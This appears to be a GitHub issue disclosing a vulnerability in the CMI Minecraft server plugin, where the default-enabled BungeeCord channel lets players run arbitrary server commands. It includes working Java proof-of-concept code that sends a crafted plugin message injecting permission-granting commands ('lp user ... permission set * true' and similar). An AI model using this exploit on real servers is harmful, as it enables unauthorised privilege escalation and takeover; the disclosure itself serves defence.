### ISSUE TITLE
BungeeCord option is enabled by default, causing the player to execute any command

### ISSUE THREAD

**Issue by Luohuayu** [Zrips/CMI#7566]
### Description of Issue

Players can send a plugin message to execute any command
Example code:
```
PacketBuffer buffer1 = new PacketBuffer(Unpooled.buffer());
buffer1.writeString("BungeeCord");
Minecraft.getMinecraft().player.connection.sendPacket(new CPacketCustomPayload("REGISTER", buffer1));

ByteArrayOutputStream buffer2 = new ByteArrayOutputStream();
DataOutputStream out1 = new DataOutputStream(buffer2);

out1.writeUTF("Unknown Server"); // Server name
out1.writeUTF(Minecraft.getMinecraft().player.getUniqueID().toString()); // Player UUID
out1.writeUTF("world;0;0;0;0"); // Location
out1.writeUTF("lp user <player> permission set * true;;pex user <player> add *;;manuaddp <player> *".replace("<player>", Minecraft.getMinecraft().player.getName())); // Command

ByteArrayOutputStream buffer3 = new ByteArrayOutputStream();
DataOutputStream out2 = new DataOutputStream(buffer3);
out2.writeUTF("CMIPortalLocSubChannel");
out2.writeShort(buffer2.toByteArray().length);
out2.write(buffer2.toByteArray());

PacketBuffer buffer4 = new PacketBuffer(Unpooled.buffer());
buffer4.writeBytes(buffer3.toByteArray());
Minecraft.getMinecraft().player.connection.sendPacket(new CPacketCustomPayload("BungeeCord", buffer4));
```

### Version Information

```shell
CMI: 9.3.0.5 BungeeCord  SqLite-> 9.3.1.3
CMILib: 1.2.4.1 -> 1.2.4.4
Server: Spigot 1.12.2-R0.1-SNAPSHOT
CMI economy: Disabled CMI Chat: Disabled
Modules -> 56 enabled 1 disabled: votifier
```

### Errors

```shell
No error
```

### Relevant Config Sections

```yaml
BungeeCord:
  # You can disable bungeecord support entirely if you are exrperiencing issues with it
  # When setting this to false some features like public messages over bungee cord, private messages over bungeecord, portals over bungecoord and other features will stop working
  # Keep in mind that regular behavior of those features will remain intacted
  Enabled: true
  # When set to true player names from entire bungee network will be included into tab complete
  NamesInTabComplete: false
```

### Agreements

- [X] My server is supported by CMI.
- [X] My version of CMI at the time of this report is up to date.
- [X] I have searched the github and asked around before making this report.
